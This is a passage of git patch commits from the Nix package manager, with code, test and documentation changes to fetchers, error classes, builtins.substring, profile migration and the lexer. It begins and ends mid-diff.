isExportIgnored(const CanonPath & path) + { const char *exportIgnoreEntry = nullptr; // GIT_ATTR_CHECK_INDEX_ONLY: @@ -721,7 +722,8 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isAllowed(const CanonPath & path) override { + bool isAllowed(const CanonPath & path) override + { return !isExportIgnored(path); } From f68ad5acbb74c32d7ae6019bc17931940456603a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 16:05:36 +0100 Subject: [PATCH 239/654] fetchTree/git: Don't expose exportIgnore attr --- src/libexpr/primops/fetchTree.cc | 4 ---- 1 file changed, 4 deletions(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 4d22ca01e..7251cbbbe 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -40,10 +40,6 @@ void emitTreeAttrs( attrs.alloc("submodules").mkBool( fetchers::maybeGetBoolAttr(input.attrs, "submodules").value_or(false)); - if (input.getType() == "git") - attrs.alloc("exportIgnore").mkBool( - fetchers::maybeGetBoolAttr(input.attrs, "exportIgnore").value_or(false)); - if (!forceDirty) { if (auto rev = input.getRev()) { From 8c7e2ed77c3c14f8a7c82ab6ab7b20ebcfb943a0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 16:21:07 +0100 Subject: [PATCH 240/654] Update release notes --- doc/manual/rl-next/nix-profile-names.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-profile-names.md b/doc/manual/rl-next/nix-profile-names.md index f5953bd72..b7ad4b5d7 100644 --- a/doc/manual/rl-next/nix-profile-names.md +++ b/doc/manual/rl-next/nix-profile-names.md @@ -3,4 +3,6 @@ synopsis: "`nix profile` now allows referring to elements by human-readable name prs: 8678 --- -[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Indices are deprecated and will be removed in a future version. +[`nix profile`](@docroot@/command-ref/new-cli/nix3-profile.md) now uses names to refer to installed packages when running [`list`](@docroot@/command-ref/new-cli/nix3-profile-list.md), [`remove`](@docroot@/command-ref/new-cli/nix3-profile-remove.md) or [`upgrade`](@docroot@/command-ref/new-cli/nix3-profile-upgrade.md) as opposed to indices. Profile element names are generated when a package is installed and remain the same until the package is removed. + +**Warning**: The `manifest.nix` file used to record the contents of profiles has changed. Nix will automatically upgrade profiles to the new version when you modify the profile. After that, the profile can no longer be used by older versions of Nix. From 72560f7bbef2ab3c02b8ca040fe084328bdd5fbe Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 12 Jan 2024 16:33:15 +0100 Subject: [PATCH 241/654] Add profile migration test --- tests/functional/nix-profile.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 003af5174..6f304bd9a 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -193,3 +193,12 @@ nix profile install $flake2Dir --priority 0 clearProfiles nix profile install $(nix build $flake1Dir --no-link --print-out-paths) expect 1 nix profile install --impure --expr "(builtins.getFlake ''$flake2Dir'').packages.$system.default" + +# Test upgrading from profile version 2. +clearProfiles +mkdir -p $TEST_ROOT/import-profile +outPath=$(nix build --no-link --print-out-paths $flake1Dir/flake.nix^out) +printf '{ "version": 2, "elements": [ { "active": true, "attrPath": "legacyPackages.x86_64-linux.hello", "originalUrl": "flake:nixpkgs", "outputs": null, "priority": 5, "storePaths": [ "%s" ], "url": "github:NixOS/nixpkgs/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" } ] }' "$outPath" > $TEST_ROOT/import-profile/manifest.json +nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) +nix profile list | grep -A4 'Name:.*hello' | grep "Store paths:.*$outPath" +nix profile remove hello 2>&1 | grep 'removed 1 packages, kept 0 packages' From d80c582b783e4c189432a2afd383be39cc09f17c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 17:16:59 +0100 Subject: [PATCH 242/654] libfetchers: Add CachingFilteringInputAccessor Co-authored-by: Eelco Dolstra --- src/libfetchers/filtering-input-accessor.cc | 9 +++++++++ src/libfetchers/filtering-input-accessor.hh | 14 ++++++++++++++ 2 files changed, 23 insertions(+) diff --git a/src/libfetchers/filtering-input-accessor.cc b/src/libfetchers/filtering-input-accessor.cc index 5ae416fd3..581ce3c1d 100644 --- a/src/libfetchers/filtering-input-accessor.cc +++ b/src/libfetchers/filtering-input-accessor.cc @@ -80,4 +80,13 @@ ref AllowListInputAccessor::create( return make_ref(next, std::move(allowedPaths), std::move(makeNotAllowedError)); } +bool CachingFilteringInputAccessor::isAllowed(const CanonPath & path) +{ + auto i = cache.find(path); + if (i != cache.end()) return i->second; + auto res = isAllowedUncached(path); + cache.emplace(path, res); + return res; +} + } diff --git a/src/libfetchers/filtering-input-accessor.hh b/src/libfetchers/filtering-input-accessor.hh index 2e2495c78..8a9b206ee 100644 --- a/src/libfetchers/filtering-input-accessor.hh +++ b/src/libfetchers/filtering-input-accessor.hh @@ -71,4 +71,18 @@ struct AllowListInputAccessor : public FilteringInputAccessor using FilteringInputAccessor::FilteringInputAccessor; }; +/** + * A wrapping `InputAccessor` mix-in where `isAllowed()` caches the result of virtual `isAllowedUncached()`. + */ +struct CachingFilteringInputAccessor : FilteringInputAccessor +{ + std::map cache; + + using FilteringInputAccessor::FilteringInputAccessor; + + bool isAllowed(const CanonPath & path) override; + + virtual bool isAllowedUncached(const CanonPath & path) = 0; +}; + } From 274d887feee7e8bc3d4a7e6c5087fbe5aec4fd4e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 17:18:56 +0100 Subject: [PATCH 243/654] fetchTree/git: Cache export-ignore filter --- src/libfetchers/git-utils.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index b416c3b52..bfc7059fe 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -660,12 +660,12 @@ struct GitInputAccessor : InputAccessor } }; -struct GitExportIgnoreInputAccessor : FilteringInputAccessor { +struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor { ref repo; std::optional rev; GitExportIgnoreInputAccessor(ref repo, ref next, std::optional rev) - : FilteringInputAccessor(next, [&](const CanonPath & path) { + : CachingFilteringInputAccessor(next, [&](const CanonPath & path) { return RestrictedPathError(fmt("'%s' does not exist because it was fetched with exportIgnore enabled", path)); }) , repo(repo) @@ -722,7 +722,7 @@ struct GitExportIgnoreInputAccessor : FilteringInputAccessor { } } - bool isAllowed(const CanonPath & path) override + bool isAllowedUncached(const CanonPath & path) override { return !isExportIgnored(path); } From 25c889baacd6a8b9b66ce4776ec729a40e39cf77 Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Thu, 11 Jan 2024 14:40:54 -0800 Subject: [PATCH 244/654] Fix performance of builtins.substring for empty substrings When returning a 0-length substring, avoid calling coerceToString, since it returns a string_view with the string's length, which is expensive to compute for large strings. --- src/libexpr/primops.cc | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index ee07e5568..c08aea898 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -3712,9 +3712,6 @@ static RegisterPrimOp primop_toString({ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, Value & v) { int start = state.forceInt(*args[0], pos, "while evaluating the first argument (the start offset) passed to builtins.substring"); - int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); - NixStringContext context; - auto s = state.coerceToString(pos, *args[2], context, "while evaluating the third argument (the string) passed to builtins.substring"); if (start < 0) state.debugThrowLastTrace(EvalError({ @@ -3722,6 +3719,22 @@ static void prim_substring(EvalState & state, const PosIdx pos, Value * * args, .errPos = state.positions[pos] })); + + int len = state.forceInt(*args[1], pos, "while evaluating the second argument (the substring length) passed to builtins.substring"); + + // Special-case on empty substring to avoid O(n) strlen + // This allows for the use of empty substrings to efficently capture string context + if (len == 0) { + state.forceValue(*args[2], pos); + if (args[2]->type() == nString) { + v.mkString("", args[2]->context()); + return; + } + } + + NixStringContext context; + auto s = state.coerceToString(pos, *args[2], context, "while evaluating the third argument (the string) passed to builtins.substring"); + v.mkString((unsigned int) start >= s->size() ? "" : s->substr(start, len), context); } From 6208ca72093a0e05c56561dab349423f9bff069b Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 17:03:28 -0500 Subject: [PATCH 245/654] Separate `SystemError` from `SysError` Most of this is a `catch SysError` -> `catch SystemError` sed. This is a rather pure-churn change I would like to get out of the way. **The intersting part is `src/libutil/error.hh`.** On Unix, we will only throw the `SysError` concrete class, which has the same constructors that `SystemError` used to have. On Windows, we will throw `WinError` *and* `SysError`. `WinError` (which will be created in a later PR), will use a `DWORD` instead of `int` error value, and `GetLastError()`, which is the Windows equivalent of the `errno` machinery. Windows will *also* use `SysError` because Window's "libc" (MSVCRT) implements the POSIX interface, and we use it too. As the docs describe, while we *throw* one of the 3 choices above (2 concrete classes or the alias), we should always *catch* `SystemError`. This ensures no matter how the implementation changes for Windows (e.g. between `SysError` and `WinError`) the catching logic stays the same and stays correct. Co-Authored-By volth Co-Authored-By Eugene Butler --- src/libcmd/repl.cc | 2 +- src/libstore/build/local-derivation-goal.cc | 4 +- src/libstore/gc.cc | 2 +- src/libstore/globals.cc | 2 +- src/libstore/keys.cc | 2 +- src/libstore/local-store.cc | 2 +- src/libstore/optimise-store.cc | 2 +- src/libstore/remote-fs-accessor.cc | 4 +- src/libutil/args.cc | 2 +- src/libutil/cgroup.cc | 2 +- src/libutil/config.cc | 2 +- src/libutil/error.hh | 42 ++++++++++++++++++--- src/libutil/file-descriptor.cc | 2 +- src/libutil/logging.cc | 2 +- src/libutil/serialise.cc | 2 +- src/libutil/util.cc | 2 +- src/nix-build/nix-build.cc | 2 +- src/nix/config-check.cc | 2 +- tests/unit/libutil/logging.cc | 6 +-- 19 files changed, 59 insertions(+), 27 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 72e3559df..918b2e53a 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -254,7 +254,7 @@ void NixRepl::mainLoop() rl_readline_name = "nix-repl"; try { createDirs(dirOf(historyFile)); - } catch (SysError & e) { + } catch (SystemError & e) { logWarning(e.info()); } #ifndef USE_READLINE diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index b01d9e237..f85301950 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -1495,7 +1495,7 @@ void LocalDerivationGoal::startDaemon() daemon::processConnection(store, from, to, NotTrusted, daemon::Recursive); debug("terminated daemon connection"); - } catch (SysError &) { + } catch (SystemError &) { ignoreException(); } }); @@ -1707,7 +1707,7 @@ void LocalDerivationGoal::runChild() try { if (drv->isBuiltin() && drv->builder == "builtin:fetchurl") netrcData = readFile(settings.netrcFile); - } catch (SysError &) { } + } catch (SystemError &) { } #if __linux__ if (useChroot) { diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 2bd3a2edc..5cbce0748 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -413,7 +413,7 @@ void LocalStore::findRuntimeRoots(Roots & roots, bool censor) auto env_end = std::sregex_iterator{}; for (auto i = std::sregex_iterator{envString.begin(), envString.end(), storePathRegex}; i != env_end; ++i) unchecked[i->str()].emplace(envFile); - } catch (SysError & e) { + } catch (SystemError & e) { if (errno == ENOENT || errno == EACCES || errno == ESRCH) continue; throw; diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc index 50584e06c..d22ae4ca0 100644 --- a/src/libstore/globals.cc +++ b/src/libstore/globals.cc @@ -118,7 +118,7 @@ void loadConfFile() try { std::string contents = readFile(path); globalConfig.applyConfig(contents, path); - } catch (SysError &) { } + } catch (SystemError &) { } }; applyConfigFile(settings.nixConfDir + "/nix.conf"); diff --git a/src/libstore/keys.cc b/src/libstore/keys.cc index 2cc50970f..70478e7ad 100644 --- a/src/libstore/keys.cc +++ b/src/libstore/keys.cc @@ -19,7 +19,7 @@ PublicKeys getDefaultPublicKeys() try { SecretKey secretKey(readFile(secretKeyFile)); publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); - } catch (SysError & e) { + } catch (SystemError & e) { /* Ignore unreadable key files. That's normal in a multi-user installation. */ } diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 0f3c37c8a..5a399c8be 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -276,7 +276,7 @@ LocalStore::LocalStore(const Params & params) [[gnu::unused]] auto res2 = ftruncate(fd.get(), settings.reservedSize); } } - } catch (SysError & e) { /* don't care about errors */ + } catch (SystemError & e) { /* don't care about errors */ } /* Acquire the big fat lock in shared mode to make sure that no diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index a494e6ecc..78e4f6d86 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -242,7 +242,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, /* Atomically replace the old file with the new hard link. */ try { renameFile(tempLink, path); - } catch (SysError & e) { + } catch (SystemError & e) { if (unlink(tempLink.c_str()) == -1) printError("unable to unlink '%1%'", tempLink); if (errno == EMLINK) { diff --git a/src/libstore/remote-fs-accessor.cc b/src/libstore/remote-fs-accessor.cc index 03e57a565..b44edfe89 100644 --- a/src/libstore/remote-fs-accessor.cc +++ b/src/libstore/remote-fs-accessor.cc @@ -87,13 +87,13 @@ std::pair, CanonPath> RemoteFSAccessor::fetch(const CanonPat nars.emplace(storePath.hashPart(), narAccessor); return {narAccessor, restPath}; - } catch (SysError &) { } + } catch (SystemError &) { } try { auto narAccessor = makeNarAccessor(nix::readFile(cacheFile)); nars.emplace(storePath.hashPart(), narAccessor); return {narAccessor, restPath}; - } catch (SysError &) { } + } catch (SystemError &) { } } StringSink sink; diff --git a/src/libutil/args.cc b/src/libutil/args.cc index e2668c673..5187e7396 100644 --- a/src/libutil/args.cc +++ b/src/libutil/args.cc @@ -304,7 +304,7 @@ void RootArgs::parseCmdline(const Strings & _cmdline, bool allowShebang) for (auto pos = savedArgs.begin(); pos != savedArgs.end();pos++) cmdline.push_back(*pos); } - } catch (SysError &) { } + } catch (SystemError &) { } } for (auto pos = cmdline.begin(); pos != cmdline.end(); ) { diff --git a/src/libutil/cgroup.cc b/src/libutil/cgroup.cc index 4c2bf31ff..de83b5ad1 100644 --- a/src/libutil/cgroup.cc +++ b/src/libutil/cgroup.cc @@ -95,7 +95,7 @@ static CgroupStats destroyCgroup(const Path & cgroup, bool returnStats) using namespace std::string_literals; warn("killing stray builder process %d (%s)...", pid, trim(replaceStrings(cmdline, "\0"s, " "))); - } catch (SysError &) { + } catch (SystemError &) { } } // FIXME: pid wraparound diff --git a/src/libutil/config.cc b/src/libutil/config.cc index a3310f4ec..37f5b50c7 100644 --- a/src/libutil/config.cc +++ b/src/libutil/config.cc @@ -124,7 +124,7 @@ static void applyConfigInner(const std::string & contents, const std::string & p try { std::string includedContents = readFile(path); applyConfigInner(includedContents, p, parsedContents); - } catch (SysError &) { + } catch (SystemError &) { // TODO: Do we actually want to ignore this? Or is it better to fail? } } else if (!ignoreMissing) { diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 234cbe1f6..764fac1ce 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -178,20 +178,50 @@ MakeError(Error, BaseError); MakeError(UsageError, Error); MakeError(UnimplementedError, Error); -class SysError : public Error +/** + * To use in catch-blocks. + */ +MakeError(SystemError, Error); + +/** + * POSIX system error, created using `errno`, `strerror` friends. + * + * Throw this, but prefer not to catch this, and catch `SystemError` + * instead. This allows implementations to freely switch between this + * and `WinError` without breaking catch blocks. + * + * However, it is permissible to catch this and rethrow so long as + * certain conditions are not met (e.g. to catch only if `errNo = + * EFooBar`). In that case, try to also catch the equivalent `WinError` + * code. + * + * @todo Rename this to `PosixError` or similar. At this point Windows + * support is too WIP to justify the code churn, but if it is finished + * then a better identifier becomes moe worth it. + */ +class SysError : public SystemError { public: int errNo; + /** + * Construct using the explicitly-provided error number. `strerror` + * will be used to try to add additional information to the message. + */ template - SysError(int errNo_, const Args & ... args) - : Error("") + SysError(int errNo, const Args & ... args) + : SystemError(""), errNo(errNo) { - errNo = errNo_; auto hf = hintfmt(args...); err.msg = hintfmt("%1%: %2%", normaltxt(hf.str()), strerror(errNo)); } + /** + * Construct using the ambient `errno`. + * + * Be sure to not perform another `errno`-modifying operation before + * calling this constructor! + */ template SysError(const Args & ... args) : SysError(errno, args ...) @@ -199,7 +229,9 @@ public: } }; -/** Throw an exception for the purpose of checking that exception handling works; see 'initLibUtil()'. +/** + * Throw an exception for the purpose of checking that exception + * handling works; see 'initLibUtil()'. */ void throwExceptionSelfCheck(); diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 38dd70c8e..692be3383 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -231,7 +231,7 @@ void closeMostFDs(const std::set & exceptions) } } return; - } catch (SysError &) { + } catch (SystemError &) { } #endif diff --git a/src/libutil/logging.cc b/src/libutil/logging.cc index 183aee2dc..d68ddacc0 100644 --- a/src/libutil/logging.cc +++ b/src/libutil/logging.cc @@ -116,7 +116,7 @@ void writeToStderr(std::string_view s) { try { writeFull(STDERR_FILENO, s, false); - } catch (SysError & e) { + } catch (SystemError & e) { /* Ignore failing writes to stderr. We need to ignore write errors to ensure that cleanup code that logs to stderr runs to completion if the other side of stderr has been closed diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 76b378e18..316105603 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -53,7 +53,7 @@ void FdSink::writeUnbuffered(std::string_view data) written += data.size(); try { writeFull(fd, data); - } catch (SysError & e) { + } catch (SystemError & e) { _good = false; throw; } diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 7b4b1d031..b23362b5c 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -20,7 +20,7 @@ void initLibUtil() { // When exception handling fails, the message tends to be printed by the // C++ runtime, followed by an abort. // For example on macOS we might see an error such as - // libc++abi: terminating with uncaught exception of type nix::SysError: error: C++ exception handling is broken. This would appear to be a problem with the way Nix was compiled and/or linked and/or loaded. + // libc++abi: terminating with uncaught exception of type nix::SystemError: error: C++ exception handling is broken. This would appear to be a problem with the way Nix was compiled and/or linked and/or loaded. bool caught = false; try { throwExceptionSelfCheck(); diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc index ee2addb72..1ad4b387c 100644 --- a/src/nix-build/nix-build.cc +++ b/src/nix-build/nix-build.cc @@ -148,7 +148,7 @@ static void main_nix_build(int argc, char * * argv) args.push_back(word); } } - } catch (SysError &) { } + } catch (SystemError &) { } } struct MyArgs : LegacyArgs, MixEvalArgs diff --git a/src/nix/config-check.cc b/src/nix/config-check.cc index 410feca2f..8d4717e15 100644 --- a/src/nix/config-check.cc +++ b/src/nix/config-check.cc @@ -107,7 +107,7 @@ struct CmdConfigCheck : StoreCommand if (profileDir.find("/profiles/") == std::string::npos) dirs.insert(dir); } - } catch (SysError &) {} + } catch (SystemError &) {} } if (!dirs.empty()) { diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index c6dfe63d3..8950a26d4 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -73,7 +73,7 @@ namespace nix { } - TEST(logEI, picksUpSysErrorExitCode) { + TEST(logEI, picksUpSystemErrorExitCode) { MakeError(TestError, Error); ErrorInfo::programName = std::optional("error-unit-test"); @@ -81,12 +81,12 @@ namespace nix { try { auto x = readFile(-1); } - catch (SysError &e) { + catch (SystemError &e) { testing::internal::CaptureStderr(); logError(e.info()); auto str = testing::internal::GetCapturedStderr(); - ASSERT_STREQ(str.c_str(), "\x1B[31;1merror:\x1B[0m\x1B[34;1m --- SysError --- error-unit-test\x1B[0m\nstatting file: \x1B[33;1mBad file descriptor\x1B[0m\n"); + ASSERT_STREQ(str.c_str(), "\x1B[31;1merror:\x1B[0m\x1B[34;1m --- SystemError --- error-unit-test\x1B[0m\nstatting file: \x1B[33;1mBad file descriptor\x1B[0m\n"); } } From 1996105e91d8d2022869c4e66c0a0734e363052b Mon Sep 17 00:00:00 2001 From: Mel Zuser Date: Fri, 12 Jan 2024 08:57:08 -0800 Subject: [PATCH 246/654] added test for empty substring special case --- tests/functional/lang/eval-okay-substring-context.exp | 1 + tests/functional/lang/eval-okay-substring-context.nix | 11 +++++++++++ 2 files changed, 12 insertions(+) create mode 100644 tests/functional/lang/eval-okay-substring-context.exp create mode 100644 tests/functional/lang/eval-okay-substring-context.nix diff --git a/tests/functional/lang/eval-okay-substring-context.exp b/tests/functional/lang/eval-okay-substring-context.exp new file mode 100644 index 000000000..2fe7f71fa --- /dev/null +++ b/tests/functional/lang/eval-okay-substring-context.exp @@ -0,0 +1 @@ +"okay" diff --git a/tests/functional/lang/eval-okay-substring-context.nix b/tests/functional/lang/eval-okay-substring-context.nix new file mode 100644 index 000000000..d0ef70d4e --- /dev/null +++ b/tests/functional/lang/eval-okay-substring-context.nix @@ -0,0 +1,11 @@ +with builtins; + +let + + s = "${builtins.derivation { name = "test"; builder = "/bin/sh"; system = "x86_64-linux"; }}"; + +in + +if getContext s == getContext "${substring 0 0 s + unsafeDiscardStringContext s}" +then "okay" +else throw "empty substring should preserve context" From b29be1ff57e6e358b2925012a13d7d4a0312560e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 10:01:55 -0800 Subject: [PATCH 247/654] Document unit tests in hacking.md --- doc/manual/src/contributing/hacking.md | 5 ++++- doc/manual/src/contributing/testing.md | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9a03ac9b6..0fa59e891 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -51,11 +51,14 @@ To install it in `$(pwd)/outputs` and test it: ```console [nix-shell]$ make install -[nix-shell]$ make installcheck -j $NIX_BUILD_CORES +[nix-shell]$ make installcheck check -j $NIX_BUILD_CORES [nix-shell]$ nix --version nix (Nix) 2.12 ``` +For more information on running and filtering tests, see +[`testing.md`](./testing.md). + To build a release version of Nix for the current operating system and CPU architecture: ```console diff --git a/doc/manual/src/contributing/testing.md b/doc/manual/src/contributing/testing.md index d8d162379..31c39c16c 100644 --- a/doc/manual/src/contributing/testing.md +++ b/doc/manual/src/contributing/testing.md @@ -77,7 +77,7 @@ there is no risk of any build-system wildcards for the library accidentally pick ### Running tests You can run the whole testsuite with `make check`, or the tests for a specific component with `make libfoo-tests_RUN`. -Finer-grained filtering is also possible using the [--gtest_filter](https://google.github.io/googletest/advanced.html#running-a-subset-of-the-tests) command-line option, or the `GTEST_FILTER` environment variable. +Finer-grained filtering is also possible using the [--gtest_filter](https://google.github.io/googletest/advanced.html#running-a-subset-of-the-tests) command-line option, or the `GTEST_FILTER` environment variable, e.g. `GTEST_FILTER='ErrorTraceTest.*' make check`. ### Characterisation testing { #characaterisation-testing-unit } From 2d96c7a51f04755dc22856be012bd73dec13ad13 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 11:27:31 -0800 Subject: [PATCH 248/654] Remove outdated reference to `y` in `nix-instantiate` man page --- doc/manual/src/command-ref/nix-instantiate.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index 483150aa8..89e106bb0 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -179,12 +179,7 @@ $ nix-instantiate --eval --xml --expr '{ x = {}; }' -``` -Note that `y` is left unevaluated (the XML representation doesn’t -attempt to show non-normal forms). - -```console $ nix-instantiate --eval --xml --strict --expr '{ x = {}; }' From f73e50144f21adc9a6344bc4a5f8ded757d781fd Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 11:31:49 -0800 Subject: [PATCH 249/654] Clarify ambiguity in `nix-instantiate` man page --- doc/manual/src/command-ref/nix-instantiate.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index 89e106bb0..479c9abcf 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -44,9 +44,10 @@ standard input. > **Warning** > - > This option produces ambiguous output which is not suitable for machine - > consumption. For example, these two Nix expressions print the same result - > despite having different types: + > This option produces output which can be parsed as a Nix expression which + > will produce a different result than the input expression when evaluated. + > For example, these two Nix expressions print the same result despite + > having different meaning: > > ```console > $ nix-instantiate --eval --expr '{ a = {}; }' From 15f7bdaf276252f7b536c189b9b3eef73ad0e6e7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 22:55:37 +0100 Subject: [PATCH 250/654] CanonPath: Add rel_c_str() Defensively because isRoot() is also defensive. --- src/libfetchers/git-utils.cc | 3 +-- src/libutil/canon-path.hh | 7 +++++++ 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index bfc7059fe..6726407b5 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -674,8 +674,7 @@ struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor { bool gitAttrGet(const CanonPath & path, const char * attrName, const char * & valueOut) { - std::string pathStr {path.rel()}; - const char * pathCStr = pathStr.c_str(); + const char * pathCStr = path.rel_c_str(); if (rev) { git_attr_options opts = GIT_ATTR_OPTIONS_INIT; diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 6aff4ec0d..997c8c731 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -88,6 +88,13 @@ public: std::string_view rel() const { return ((std::string_view) path).substr(1); } + const char * rel_c_str() const + { + auto cs = path.c_str(); + assert(cs[0]); // for safety if invariant is broken + return &cs[1]; + } + struct Iterator { std::string_view remaining; From dd7e7b0a30a0564741c40e70f33cbf1cd6130106 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:26:03 -0500 Subject: [PATCH 251/654] Newer Nixpkgs, get `readline` on Windows MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Now `nix repl` an, in principle, work on that platform too. Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/2c9c58e98243930f8cb70387934daa4bc8b00373' (2023-12-31) → 'github:NixOS/nixpkgs/86501af7f1d51915e6c335f90f2cab73d7704ef3' (2024-01-11) --- flake.lock | 6 +++--- package.nix | 1 - 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/flake.lock b/flake.lock index ae98d789a..65e468e8b 100644 --- a/flake.lock +++ b/flake.lock @@ -34,11 +34,11 @@ }, "nixpkgs": { "locked": { - "lastModified": 1704018918, - "narHash": "sha256-erjg/HrpC9liEfm7oLqb8GXCqsxaFwIIPqCsknW5aFY=", + "lastModified": 1704982786, + "narHash": "sha256-w62+4HyaHafLWjvrC2Eto7bSnSJQtia8oqs3//mkpCU=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "2c9c58e98243930f8cb70387934daa4bc8b00373", + "rev": "86501af7f1d51915e6c335f90f2cab73d7704ef3", "type": "github" }, "original": { diff --git a/package.nix b/package.nix index 37410dc2f..a632fd6ec 100644 --- a/package.nix +++ b/package.nix @@ -236,7 +236,6 @@ in { openssl sqlite xz - ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ ({ inherit readline editline; }.${readlineFlavor}) ] ++ lib.optionals enableMarkdown [ lowdown From e739a5002dab199a6cf207e6e62b394fa77f8cb2 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 12 Jan 2024 19:46:48 -0500 Subject: [PATCH 252/654] Avoid Windows macros in the parser and lexer `FLOAT`, `INT`, and `IN` are identifers taken by macros. The name `IN_KW` is chosen to match `OR_KW`, which is presumably named that way for the same reason of dodging macros. --- src/libexpr/lexer.l | 6 +++--- src/libexpr/parser.y | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index df2cbd06f..9addb3ae8 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -130,7 +130,7 @@ else { return ELSE; } assert { return ASSERT; } with { return WITH; } let { return LET; } -in { return IN; } +in { return IN_KW; } rec { return REC; } inherit { return INHERIT; } or { return OR_KW; } @@ -156,7 +156,7 @@ or { return OR_KW; } .errPos = data->state.positions[CUR_POS], }); } - return INT; + return INT_LIT; } {FLOAT} { errno = 0; yylval->nf = strtod(yytext, 0); @@ -165,7 +165,7 